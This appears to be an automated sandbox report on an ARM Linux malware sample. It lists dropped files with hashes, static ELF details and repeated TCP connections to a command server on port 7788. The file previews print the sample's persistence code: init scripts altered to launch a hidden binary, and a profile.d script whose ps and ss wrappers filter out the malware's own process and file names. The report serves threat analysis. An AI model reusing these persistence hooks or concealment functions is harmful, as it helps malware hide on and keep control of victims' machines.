/lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.

/etc/init.d/uuidd

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	5.2132074992430075
Encrypted:	false
SSDEEP:	24:aNmC4ozLk8BZa8LNfwa0dDEPLu5CB5ZM51Hdwi/DqT0KtOC:3VozBjdh0d4PLuIBvMNwiuIKtl
MD5:	4A25430D50590B5FD530703742868720
SHA1:	FB4D80FD6B01795838C4D0A49B1467910FF3FB4D
SHA-256:	0CE2C7B3FEA143F8855B7BE493906899F6CAFC7D9558AB315D10E62CAF59AC61
SHA-512:	15375558913D6AF219281A08A470F8BEBC4B729119DC317D9FBFE60892F9CB76AD9BF8704BC0CE7FB3BF5EFA3BE279021EC8000AF4AB3E4034D0CE67C12F91D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system.mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&

/etc/init.d/x11-common

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2911
Entropy (8bit):	4.896684913637708
Encrypted:	false
SSDEEP:	48:ZETjwC4gFkV8ZSVwxPRyye1vrBy9DuIpPX5uCXAepm1L+/WAhtX76XGMgH3:SIgFkVlVY1IT09DuYX5HX3aidOX8
MD5:	ED4AAC2A7BFA47958A11198C382AF668
SHA1:	3646EAC456824AA2D579E5E66F8050CC886C44E7
SHA-256:	8D107A508429EC4AE1049F1BB79260CC2B4E10EDB952DC764FB4ED7979A409AC
SHA-512:	AAA3B8EC1B82F46E3FA10ADDF3BB9B7E4FC93B9B575BCD5D4BCE712F17117F10059BF0A0E827982B613422E8FE009F31B8ED68B3B9F4EF2202A73E155CDD4279
Malicious:	true
Preview:	#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system.mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system.mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] \|\| [ -h $DIR ]; then./lib/system.mar

/etc/profile.d/bash.cfg

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=FRzpQZTUsYP7nS6EO2I9/tgRlYj8FE4XDUdPumWAp/M8pzTaAOFHhsAFBcUiYU/LZ4ma86tX3sTSTnp6AAc, stripped
Category:	dropped
Size (bytes):	5243032
Entropy (8bit):	6.032812796621413
Encrypted:	false
SSDEEP:	49152:wagnab47zaAs4cqq0OM9VpiOMXwXpfdmFEo:wagn8cVs4cqq6ZdmFEo
MD5:	F88F1C803432B72243DA85089264BC92
SHA1:	380F766EEC0B181CB094B51E366487DEABD0D312
SHA-256:	1D37CF0BBE88047CAF8442DB890EDAD597A52A70FBAB49CE258A51F9EA1B3163
SHA-512:	C6E56E053C0B6C0D623D2BABF45BD4FFEDDC3FBB7A886CDA96F28F03430420B01D860E00691C6DA3FC804BE441536466183C2A60B340D903F6C874A476D04113
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	.ELF..............(.....d...4...........4. ...(.........4...4...4...................................d...d...........................H^).H^)..................+...+... ... ...............K...L...L.................Q.td........................................................................................HN).................].............+.....I..................e............I7..I6.t...................o............a7..a6.....................y............e7..e6..................................e7..e6..p..................5.............L...K...................................L...K..d..............................@fP.@fO.xR................................P...O.x...............................0oS.0oR....................C...................d.....................................P.........................................................................................................................................................................................................................

/etc/profile.d/bash.cfg.sh

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.204582217613529
Encrypted:	false
SSDEEP:	3:TKH/binKX:siKX
MD5:	5C67BC6A39813CE4346CB7CA206A9393
SHA1:	F99586987650CFA169F5110198CBDE17B82FD2BA
SHA-256:	29EC88CF1C7403CC92602408772AB2FCE6E26E10E29E0C19F6FCF03AC6E1B483
SHA-512:	BF8701863EB49B3552181620944D05C23C63762E386D6C353609DE3D71784CB87E054F279FE56A1C661C927813DEF4481586E3BC5C820D20DCEC7F3F891F2A8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash./etc/profile.d/bash.cfg

/etc/profile.d/gateway.sh

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	Bourne-Again shell script, ASCII text executable, with very long lines (705)
Category:	dropped
Size (bytes):	4904
Entropy (8bit):	4.835346749066916
Encrypted:	false
SSDEEP:	96:sSr2vBOPmf2/4Sr2vBOPmf2/CSr2vBOPmf2/aSr2vBOPmf2/wSr2vBOPmf2/gSrE:si2vBOPmf2/4i2vBOPmf2/Ci2vBOPmft
MD5:	55934CACCEEE3E961200E5CC97A8F0FE
SHA1:	2DBA2FBB36227254EB79789408EDD55AFAD2B0BF
SHA-256:	329DED94732F9A3135B15CEFE7F9E45DE3B586DF98EFFCF2E6155CFF2927C4BF
SHA-512:	32BA801BEB082B6E6B6660A2D2CD651A52792ED143CAEF0BE66D0A50794E7A216C542BEE6A80FCB5C36B5C95E8E6695F3AE29E754F20144A029CCE55C677283A
Malicious:	true
Preview:	#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(echo "$proc_name" \| sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" \| sed -e '/.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/libgdi.so.0.8.2/d');proc_name=$(echo "$proc_name" \| sed -e '/system.mark/d');proc_name=$(echo "$proc_name" \| sed -e '/netstat.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/bash.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/0S3wxWer8x.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" \| sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" \| sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" \| sed -e '/system.pub/d');proc_name=$(

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/proc/5656/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/run/crond.pid

Download File

Process:	/usr/sbin/cron
File Type:	ASCII text
Category:	dropped
Size (bytes):	10
Entropy (8bit):	1.9219280948873623
Encrypted:	false
SSDEEP:	3:GnQvn:GQvn
MD5:	000FE8705E0A9884F9869F8BD6F7654D
SHA1:	7C00C40F991707EA39FE5F9CEC7D85ACE4293B56
SHA-256:	610D14A681F7DA33845591202419743C7C4A88A6820D44091A0695448CCC7817
SHA-512:	C0958C0A7B335A67A136059E35B04987611A11BFE731A43FF9FD82A6EC8D06623DF14B4837E8024E53FCB41F26E7DCC6C1D93643A2177E68EFEFCE8C377C6E56
Malicious:	false
Preview:	5685.5685.

/usr/lib/libgdi.so.0.8.2

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=FRzpQZTUsYP7nS6EO2I9/tgRlYj8FE4XDUdPumWAp/M8pzTaAOFHhsAFBcUiYU/LZ4ma86tX3sTSTnp6AAc, stripped
Category:	dropped
Size (bytes):	5243032
Entropy (8bit):	6.032812796621413
Encrypted:	false
SSDEEP:	49152:wagnab47zaAs4cqq0OM9VpiOMXwXpfdmFEo:wagn8cVs4cqq6ZdmFEo
MD5:	F88F1C803432B72243DA85089264BC92
SHA1:	380F766EEC0B181CB094B51E366487DEABD0D312
SHA-256:	1D37CF0BBE88047CAF8442DB890EDAD597A52A70FBAB49CE258A51F9EA1B3163
SHA-512:	C6E56E053C0B6C0D623D2BABF45BD4FFEDDC3FBB7A886CDA96F28F03430420B01D860E00691C6DA3FC804BE441536466183C2A60B340D903F6C874A476D04113
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	.ELF..............(.....d...4...........4. ...(.........4...4...4...................................d...d...........................H^).H^)..................+...+... ... ...............K...L...L.................Q.td........................................................................................HN).................].............+.....I..................e............I7..I6.t...................o............a7..a6.....................y............e7..e6..................................e7..e6..p..................5.............L...K...................................L...K..d..............................@fP.@fO.xR................................P...O.x...............................0oS.0oR....................C...................d.....................................P.........................................................................................................................................................................................................................

/usr/lib/system.mark

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=FRzpQZTUsYP7nS6EO2I9/tgRlYj8FE4XDUdPumWAp/M8pzTaAOFHhsAFBcUiYU/LZ4ma86tX3sTSTnp6AAc, stripped
Category:	dropped
Size (bytes):	5243032
Entropy (8bit):	6.032812796621413
Encrypted:	false
SSDEEP:	49152:wagnab47zaAs4cqq0OM9VpiOMXwXpfdmFEo:wagn8cVs4cqq6ZdmFEo
MD5:	F88F1C803432B72243DA85089264BC92
SHA1:	380F766EEC0B181CB094B51E366487DEABD0D312
SHA-256:	1D37CF0BBE88047CAF8442DB890EDAD597A52A70FBAB49CE258A51F9EA1B3163
SHA-512:	C6E56E053C0B6C0D623D2BABF45BD4FFEDDC3FBB7A886CDA96F28F03430420B01D860E00691C6DA3FC804BE441536466183C2A60B340D903F6C874A476D04113
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	.ELF..............(.....d...4...........4. ...(.........4...4...4...................................d...d...........................H^).H^)..................+...+... ... ...............K...L...L.................Q.td........................................................................................HN).................].............+.....I..................e............I7..I6.t...................o............a7..a6.....................y............e7..e6..................................e7..e6..p..................5.............L...K...................................L...K..d..............................@fP.@fO.xR................................P...O.x...............................0oS.0oR....................C...................d.....................................P.........................................................................................................................................................................................................................

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=FRzpQZTUsYP7nS6EO2I9/tgRlYj8FE4XDUdPumWAp/M8pzTaAOFHhsAFBcUiYU/LZ4ma86tX3sTSTnp6AAc, stripped
Entropy (8bit):	6.032812796621413
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	0S3wxWer8x.elf
File size:	5'243'032 bytes
MD5:	f88f1c803432b72243da85089264bc92
SHA1:	380f766eec0b181cb094b51e366487deabd0d312
SHA256:	1d37cf0bbe88047caf8442db890edad597a52a70fbab49ce258a51f9ea1b3163
SHA512:	c6e56e053c0b6c0d623d2babf45bd4ffeddc3fbb7a886cda96f28f03430420b01d860e00691c6da3fc804be441536466183c2a60b340d903f6c874a476d04113
SSDEEP:	49152:wagnab47zaAs4cqq0OM9VpiOMXwXpfdmFEo:wagn8cVs4cqq6ZdmFEo
TLSH:	E3360897B8924A43C4E43676BCBE81C433A35EB9AB9752565D04FE3C3EBE1990D38314
File Content Preview:	.ELF..............(.....d...4...........4. ...(.........4...4...4...................................d...d...........................H^).H^)...............*...+...+... ... ...............K...L...L.................Q.td.......................................

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8d564
Flags:	0x5000002
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	6
Section Header Offset:	244
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x11000	0x1000	0x294e48	0x0	0x6	AX	4
.rodata	PROGBITS	0x2b0000	0x2a0000	0xc499b	0x0	0x2	A	8
.typelink	PROGBITS	0x3749a0	0x3649a0	0x1774	0x0	0x2	A	8
.itablink	PROGBITS	0x376118	0x366118	0x490	0x0	0x2	A	8
.gosymtab	PROGBITS	0x3765a8	0x3665a8	0x0	0x0	0x2	A	1
.gopclntab	PROGBITS	0x3765a8	0x3665a8	0x1470ec	0x0	0x2	A	8
.go.buildinfo	PROGBITS	0x4c0000	0x4b0000	0x1b0	0x0	0x3	WA	16
.noptrdata	PROGBITS	0x4c01b0	0x4b01b0	0x46490	0x0	0x3	WA	8
.data	PROGBITS	0x506640	0x4f6640	0x5278	0x0	0x3	WA	8
.bss	NOBITS	0x50b8b8	0x4fb8b8	0x2b678	0x0	0x3	WA	8
.noptrbss	NOBITS	0x536f30	0x526f30	0x83c8	0x0	0x3	WA	8
.note.go.buildid	NOTE	0x10f9c	0xf9c	0x64	0x0	0x2	A	4
.shstrtab	STRTAB	0x0	0x500000	0x98	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
PHDR	0x34	0x10034	0x10034	0xc0	0xc0	2.3374	0x4	R	0x10000
NOTE	0xf9c	0x10f9c	0x10f9c	0x64	0x64	5.2123	0x4	R	0x4	.note.go.buildid
LOAD	0x0	0x10000	0x10000	0x295e48	0x295e48	5.7446	0x5	R E	0x10000	.text .note.go.buildid
LOAD	0x2a0000	0x2b0000	0x2b0000	0x20d694	0x20d694	5.6084	0x4	R	0x10000	.rodata .typelink .itablink .gosymtab .gopclntab
LOAD	0x4b0000	0x4c0000	0x4c0000	0x4b8b8	0x7f2f8	6.4768	0x6	RW	0x10000	.go.buildinfo .noptrdata .data .bss .noptrbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 18:17:07.974484921 CEST	44524	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:07.982964039 CEST	7788	44524	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:07.983366966 CEST	44524	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:07.998359919 CEST	44524	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:08.003125906 CEST	7788	44524	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:09.577830076 CEST	7788	44524	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:09.580025911 CEST	44524	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:09.588124037 CEST	7788	44524	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:09.602097034 CEST	44526	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:09.606872082 CEST	7788	44526	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:09.606923103 CEST	44526	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:09.613075972 CEST	44526	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:09.617870092 CEST	7788	44526	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:11.213155985 CEST	7788	44526	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:11.214668036 CEST	44526	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:11.219492912 CEST	7788	44526	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:11.228954077 CEST	44528	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:11.233750105 CEST	7788	44528	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:11.233823061 CEST	44528	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:11.239252090 CEST	44528	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:11.244060040 CEST	7788	44528	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:12.822813988 CEST	7788	44528	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:12.824559927 CEST	44528	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:12.824598074 CEST	44528	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:12.829380989 CEST	7788	44528	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:12.838985920 CEST	44530	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:12.843803883 CEST	7788	44530	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:12.843863010 CEST	44530	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:12.855501890 CEST	44530	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:12.860251904 CEST	7788	44530	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:14.433758020 CEST	7788	44530	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:14.435231924 CEST	44530	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:14.440119982 CEST	7788	44530	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:14.449681997 CEST	44532	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:14.454488039 CEST	7788	44532	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:14.454552889 CEST	44532	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:14.459809065 CEST	44532	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:14.464566946 CEST	7788	44532	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:16.041925907 CEST	7788	44532	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:16.043329000 CEST	44532	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:16.048253059 CEST	7788	44532	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:16.063369036 CEST	44534	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:16.068145990 CEST	7788	44534	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:16.068197966 CEST	44534	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:16.074306965 CEST	44534	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:16.079148054 CEST	7788	44534	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:17.670119047 CEST	7788	44534	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:17.671835899 CEST	44534	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:17.676631927 CEST	7788	44534	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:17.692361116 CEST	44536	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:17.697129011 CEST	7788	44536	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:17.697179079 CEST	44536	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:17.703572989 CEST	44536	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:17.708435059 CEST	7788	44536	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:19.318211079 CEST	7788	44536	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:19.320085049 CEST	44536	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:19.324861050 CEST	7788	44536	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:19.338447094 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:19.343282938 CEST	7788	44538	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:19.343339920 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:19.349539995 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:19.354337931 CEST	7788	44538	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:20.979705095 CEST	7788	44538	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:20.980248928 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:20.981278896 CEST	44538	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:20.986033916 CEST	7788	44538	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:20.995578051 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:21.000513077 CEST	7788	44540	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:21.000566959 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:21.006129980 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:21.010936022 CEST	7788	44540	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:22.610671997 CEST	7788	44540	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:22.612184048 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:22.612952948 CEST	44540	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:22.617837906 CEST	7788	44540	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:22.631357908 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:22.636245012 CEST	7788	44542	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:22.636296988 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:22.651081085 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:22.655955076 CEST	7788	44542	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:24.229918957 CEST	7788	44542	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:24.232110023 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:24.232284069 CEST	44542	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:24.237034082 CEST	7788	44542	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:24.253519058 CEST	44544	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:24.263050079 CEST	7788	44544	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:24.263138056 CEST	44544	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:24.269112110 CEST	44544	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:24.278173923 CEST	7788	44544	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:25.855611086 CEST	7788	44544	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:25.856089115 CEST	44544	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:25.857892990 CEST	44544	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:25.864120007 CEST	7788	44544	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:25.873694897 CEST	44546	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:25.878490925 CEST	7788	44546	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:25.878556967 CEST	44546	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:25.892323971 CEST	44546	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:25.898678064 CEST	7788	44546	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:27.484576941 CEST	7788	44546	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:27.486820936 CEST	44546	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:27.492312908 CEST	7788	44546	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:27.503768921 CEST	44548	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:27.508538008 CEST	7788	44548	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:27.508599997 CEST	44548	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:27.522780895 CEST	44548	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:27.527607918 CEST	7788	44548	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:29.107734919 CEST	7788	44548	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:29.109436989 CEST	44548	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:29.117070913 CEST	7788	44548	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:29.125123024 CEST	44550	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:29.130007029 CEST	7788	44550	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:29.130085945 CEST	44550	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:29.136212111 CEST	44550	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:29.141623020 CEST	7788	44550	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:30.714128017 CEST	7788	44550	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:30.715859890 CEST	44550	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:30.716289043 CEST	44550	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:30.721062899 CEST	7788	44550	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:30.737382889 CEST	44552	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:30.746589899 CEST	7788	44552	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:30.746692896 CEST	44552	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:30.756520987 CEST	44552	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:30.761440039 CEST	7788	44552	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:32.379781008 CEST	7788	44552	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:32.381268024 CEST	44552	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:32.387577057 CEST	7788	44552	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:32.404385090 CEST	44554	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:32.409986973 CEST	7788	44554	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:32.410104990 CEST	44554	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:32.423939943 CEST	44554	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:32.428757906 CEST	7788	44554	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:34.094974041 CEST	7788	44554	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:34.095698118 CEST	44554	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:34.096899986 CEST	44554	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:34.104494095 CEST	7788	44554	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:34.114712000 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:34.119777918 CEST	7788	44556	209.141.53.247	192.168.2.14
